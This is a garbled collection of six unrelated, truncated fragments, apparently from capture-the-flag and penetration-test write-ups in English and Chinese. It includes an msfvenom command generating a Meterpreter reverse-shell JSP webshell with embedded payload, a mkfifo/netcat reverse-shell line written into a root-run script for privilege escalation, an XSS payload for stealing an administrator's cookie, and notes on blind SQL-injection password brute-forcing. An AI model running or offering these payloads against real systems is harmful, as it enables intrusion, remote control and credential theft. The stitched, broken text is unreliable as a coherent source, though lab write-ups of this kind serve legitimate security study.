msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.157.129 LPORT=4444 -f jsp > shell.jsp cat shell.jsp内存马shell.jsp如下:┌──(root㉿kali)-[~] └─# cat shell.jsp <%@ page import="java.io.*" %> <% String akUWgjLOv = "7f454c4602010100000000000000000002003e...
#include<stdio.h>#include<string.h>int main(){char v[30]={0};char a[]="]P_ISRF^PCY[I_YWERYC";int n=strlen(a);for(int i=strlen(a)-1;i>=0;--i){v[n-i-1]=a[i];}for(int i=0;i<n;++i){if(v[i]==155-66){v[i]=66;}else if(v[i]==155-88){v[i]=88;}}...
If the parameters and payload have been correctly configured, metasploit should open a reverse shell. After upgrading the shell (script -qc /bin/bash /dev/null), I search the flag using the following command: find / -name "*[Ff][Ll][Aa][Gg]1*". The result of the find says the fla...
$daemon) { print "$string\n"; } } ?> kali 监听 nc -lvp 4444 点击save,成功回弹 0x04 提权 kali 监听 nc -lvp 6666 写入payload cd /opt/scripts/ echo "mkfifo /tmp/bqro; nc 172.16.89.2 6666 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> /opt/scripts/...
<?php header("Access-Control-Allow-Origin:*"); ?> <script>alert(1)</script> 马上开始打管理员的cookie。 http://kali.sycsec.com/post.php,这是一个留言板。 直接输入 <link rel=import href=http://test.com/test.php> 找了个xss平台,修改代码,提交,多输入几次打到了cookie。 不知道是成信院...
With this structure i can bruteforce password using "substr()" function, if i had the right caracter, case try to load an inexistant file with function "load_extensions()" which will return an error "not authorized". I created a python script which can perfom a user and password ...